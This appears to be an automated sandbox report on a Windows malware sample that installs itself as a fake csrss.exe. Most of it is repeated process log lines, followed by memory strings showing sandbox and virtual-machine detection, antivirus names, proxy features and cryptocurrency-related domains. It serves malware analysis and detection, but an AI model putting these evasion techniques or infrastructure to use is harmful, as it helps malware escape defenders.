Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE 